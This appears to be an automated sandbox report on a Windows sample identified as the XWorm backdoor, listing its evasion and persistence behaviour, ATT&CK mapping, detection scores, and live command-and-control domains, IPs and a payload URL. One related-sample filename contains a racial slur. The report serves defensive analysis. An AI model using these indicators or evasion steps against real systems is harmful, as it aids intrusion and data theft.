              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: 1c8DbXc5r0.exe, 00000000.00000002.2955625488.000000001C6A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\1c8DbXc5r0.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 1c8DbXc5r0.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: 1c8DbXc5r0.exe PID: 6444, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPED

              Remote Access Functionality

              Source: Yara match | File source: 1c8DbXc5r0.exe, type: SAMPLE
              Source: Yara match | File source: 0.0.1c8DbXc5r0.exe.8d0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000000.00000002.2916872836.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.1665971860.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: 1c8DbXc5r0.exe PID: 6444, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\rapent.exe, type: DROPPED
              MITRE ATT&CK Matrix (techniques listed per tactic column; a number in front of a technique is the badge the report shows next to it)

              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
              Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
              Execution: 11 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
              Persistence: 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Privilege Escalation: 11 Process Injection; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
              Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 131 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
              Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
              Discovery: 221 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery; System Owner/User Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
              Collection: 1 Input Capture; 11 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
              Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
              Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
              Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1527586
Sample: 1c8DbXc5r0.exe
Start date: 07/10/2024
Architecture: WINDOWS
Score: 100

Contacted domains: ser0xen.com; models-subscriptions.gl.at.ply.gg

Top-level signatures:

• Suricata IDS alerts for network traffic
• Malicious sample detected (through community Yara rule)
• Antivirus detection for dropped file
• 12 other signatures

Process 1c8DbXc5r0.exe (started):

• Network: models-subscriptions.gl.at.ply.gg 147.185.221.18, ports 49738, 55624 (SALSGIVERUS, United States)
• Network: ser0xen.com 18.224.107.108, ports 443, 49737 (AMAZON-02US, United States)
• Dropped file: C:\Users\user\AppData\Roaming\rapent.exe, PE32
• Signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
• Signature: Protects its processes via BreakOnTermination flag
• Signature: Bypasses PowerShell execution policy
• Signature: Adds a directory exclusion to Windows Defender
• Child processes: powershell.exe (started four times), each in turn starting conhost.exe
• Signature on powershell.exe: Loading BitLocker PowerShell Module

Source | Detection | Scanner | Label
1c8DbXc5r0.exe | 89% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm
1c8DbXc5r0.exe | 77% | Virustotal |
1c8DbXc5r0.exe | 100% | Avira | TR/Spy.Gen
1c8DbXc5r0.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\rapent.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\rapent.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\rapent.exe | 89% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm
C:\Users\user\AppData\Roaming\rapent.exe | 76% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
ser0xen.com | 2% | Virustotal |

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
https://ser0xen.com | 0% | Virustotal |
https://ser0xen.com/pl.txt | 0% | Virustotal |
http://www.microsoft.co | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ser0xen.com | 18.224.107.108 | true | true | | unknown
models-subscriptions.gl.at.ply.gg | 147.185.221.18 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://ser0xen.com/pl.txt | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.microso | powershell.exe, 00000007.00000002.1982591730.000001355AF9A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1736689632.0000024B19238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4ED9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542C9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1752215963.0000024B2907F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1832363040.0000013ED4D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1962781803.0000013552ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 00000004.00000002.1843415748.0000013EDD09E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2161525009.000001F5C42BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1736689632.0000024B19011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1783581378.0000013EC4CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1883565977.0000013542A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2019070579.000001F5B4251000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2019070579.000001F5B4478000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ser0xen.com | 1c8DbXc5r0.exe, 00000000.00000002.2916872836.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://crl.micros | powershell.exe, 00000001.00000002.1758314462.0000024B31650000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
18.224.107.108 | ser0xen.com | United States | 16509 | AMAZON-02US | true
147.185.221.18 | models-subscriptions.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1527586
                    Start date and time:2024-10-07 04:49:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 13s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:1c8DbXc5r0.exe
                    renamed because original name is a hash value
                    Original Sample Name:49aa60a3ee7d3b03d16aa591024cbbc7.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@13/20@2/2
                    EGA Information:
                    • Successful, ratio: 20%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 42
                    • Number of non-executed functions: 5
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target powershell.exe, PID 2500 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2720 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6656 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 7060 because it is empty
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
03:50:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rapent.lnk
22:50:02 | API Interceptor | 51x Sleep call for process: powershell.exe modified
22:50:55 | API Interceptor | 231175x Sleep call for process: 1c8DbXc5r0.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
18.224.107.108 | http://ser0xen.com/sucklemydicknigger.exe | malicious | XWorm | ser0xen.com/sucklemydicknigger.exe
147.185.221.18 | 6Mt223MA25.exe | malicious | ArrowRAT |
147.185.221.18 | b34J4bxnmN.exe | malicious | Njrat |
147.185.221.18 | 01koiHnedL.exe | malicious | Njrat |
147.185.221.18 | i231IEP3oh.exe | malicious | AsyncRAT |
147.185.221.18 | killer.exe | malicious | XWorm |
147.185.221.18 | system47.exe | malicious | XWorm |
147.185.221.18 | javaupdate.jar | malicious | Dynamic Stealer |
147.185.221.18 | javaupdate.jar | malicious | Dynamic Stealer |
147.185.221.18 | LisectAVT_2403002C_149.exe | malicious | AsyncRAT |
147.185.221.18 | LisectAVT_2403002C_28.exe | malicious | Remcos |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ser0xen.com | http://ser0xen.com/sucklemydicknigger.exe | malicious | XWorm | 18.224.107.108

Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | https://shorturl.at/5LwA8 | malicious | Unknown | 54.180.170.69
AMAZON-02US | http://ser0xen.com/sucklemydicknigger.exe | malicious | XWorm | 18.224.107.108
AMAZON-02US | https://maxask.com | malicious | Unknown | 54.246.173.101
AMAZON-02US | pur361ECCi.elf | malicious | Mirai | 63.32.132.7
AMAZON-02US | http://buddycities.com/ | malicious | Unknown | 52.222.236.71
AMAZON-02US | http://buckboosters.com/ | malicious | Unknown | 3.164.206.20
AMAZON-02US | https://wchckwl.org/ | malicious | Unknown | 13.35.58.15
AMAZON-02US | https://event.stibee.com/v2/click/NDA4MDIvMjQzMzA0Ny80OTAyMzcv/aHR0cHM6Ly91cHBpdHkuY28ua3IvJWVhJWI3JWI4JWViJTgyJWEwLTUlZWIlYTclOGMtJWVjJTliJTkwJWViJThjJTgwLSVlYyU4MiViYyVlYyVhMCU4NCVlYyU5ZCU4NC0lZWIlYjQlYTQlZWMlOTYlYjQlZWMlOWElOTQtMi8 | malicious | Unknown | 18.238.243.28
AMAZON-02US | http://vpnpanda.org/ | malicious | Unknown | 52.222.236.94
